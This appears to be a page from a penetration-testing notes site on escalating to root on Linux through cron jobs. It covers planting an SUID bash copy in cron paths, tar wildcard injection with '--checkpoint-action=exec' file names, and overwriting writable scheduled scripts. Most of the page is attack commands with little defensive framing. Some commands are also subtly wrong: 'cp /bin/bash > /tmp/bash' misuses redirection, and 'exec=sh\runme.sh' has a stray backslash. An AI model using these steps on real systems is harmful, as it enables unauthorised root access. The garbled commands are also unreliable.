> For the complete documentation index, see [llms.txt](https://coffeetohack.gitbook.io/coffeetohack/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://coffeetohack.gitbook.io/coffeetohack/linux/scheduled.md).

# Scheduled Tasks

## CRON PATHS:

Check the first path that is is executing. For ex: /home/user/. Check if the scheduled task file is present in that directory. If it is not present the create it.

&#x20;\
If the file has extension **.sh** and in **/home/user/** path:

```bash
echo 'cp /bin/bash > /tmp/bash; chmod +s /tmp/bash' > /home/user/file.sh
#Go to /tmp and wait for the scheduled task to run. Check the time using ls -la
#Then run the following:
/tmp/bash -p
```

## WILDCARDS:

Check if any task is running with wildcard ( \* )

Suppose **tar** is running with wildcard: **tar czf /tmp/backup.tar.gz \***

```bash
echo 'cp /bin/bash > /tmp/bash; chmod +s /tmp/bash' > runme.sh
chmod +x runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\runme.sh
#Wait for the scheduled task to run
/tmp/bash -p
```

## FILE OVERWRITES:

Check if we have write permissions on any of the schduled tasks. Then overwrite the file with a reverse shell. **(Imp: Before overwriting the file, always copy the contents of the original file to some location)**

```
echo 'cp /bin/bash > /tmp/bash; chmod +s /tmp/bash' > runme.sh
/tmp/bash -p
```
